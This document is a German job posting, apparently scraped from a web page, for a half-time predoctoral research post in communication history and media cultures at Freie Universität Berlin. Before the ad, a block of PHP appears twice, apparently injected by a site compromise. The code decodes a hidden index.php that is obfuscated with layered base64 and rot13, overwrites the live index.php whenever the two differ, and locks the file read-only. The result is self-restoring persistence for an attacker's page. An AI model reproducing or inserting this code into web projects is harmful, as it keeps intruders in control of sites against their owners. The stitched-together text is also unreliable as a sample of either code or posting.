$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Job | 0,5 Wiss. Mitarb. (Praedoc) (m/w/d) Komunikationsgeschichte/Medienkulturen (FU Berlin) – Auditive Medienkulturen

Job | 0,5 Wiss. Mitarb. (Praedoc) (m/w/d) Komunikationsgeschichte/Medienkulturen (FU Berlin)

Arbeitgeber: Freie Universität Berlin: Prof. Dr. Maria Löblich
Arbeitstelle: Kommunikationsgeschichte/Medienkulturen
Ort: Berlin
Vom – Bis: ab dem 01.10.2022, befristet bis zu 5 Jahre
Bewerbungsschluss: 13.06.2022

Wiss. Mitarbeiter:in (Prädoc) gesucht an Arbeitsstelle Komunikationsgeschichte/Medienkulturen, Prof. Dr. Maria Löblich, Institut für Publizistik- und Kommunikationswissenschaft, Freie Universität Berlin.
(befristet bis zu 5 Jahre, Entgeltgruppe 13)

Wiss. Mitarbeiter:in (Praedoc) (m/w/d) mit 1/2-Teilzeitbeschäftigung;
befristet bis zu 5 Jahre, Entgeltgruppe 13 TV-L; FU Kennung: Prädoc_KommGesch_2022

Die Stelle ist ab 01.10.2022 zu besetzen bei Frau Prof. Dr. Maria Löblich. Eine befristete Aufstockung der Stelle auf 65% ist möglich.

Aufgabengebiet und Einstellungsvoraussetzungen

Die Stelle beinhaltet:

  • Mitarbeit in Forschung und Lehre (2 LVS)
  • Wissenschaftliche Qualifikation im Rahmen einer Promotion
  • Mitarbeit an weiteren Aktivitäten der Arbeitsstelle
  • Beteiligung an Institutsaufgaben

Erforderlich ist:

  • Abgeschlossenes wiss. Hochschulstudium der Publizistik- oder Kommunikationswissenschaft, ggf. eines benachbarten sozial- oder geschichtswissenschaftlichen Fachs (Master)

Erwünscht sind:

  • Überdurchschnittlich gut abgeschlossenes wiss. Hochschulstudium
  • Interesse an und/oder Studienbestandteil in den Bereichen (Kommunikations-)Geschichte oder Medienkulturen
  • Erfahrung mit qualitativer empirischer Sozialforschung und / oder historischen Methoden
  • Gute Kenntnisse sozialwissenschaftlicher Theorien
  • Sehr gute deutsche und englische Sprachkenntnisse

Weitere Informationen erteilt:
Frau Gesine Schaefer (kommge@polsoz.fu-berlin.de / 030 838 57803).
oder unter: https://www.fu-berlin.de/universitaet/beruf-karriere/jobs/wiss/15_fb-politik-und-sozialwissenschaften/PS-Praedoc_KommGesch_2022.html


Quelle: https://www.hsozkult.de/job/id/job-98263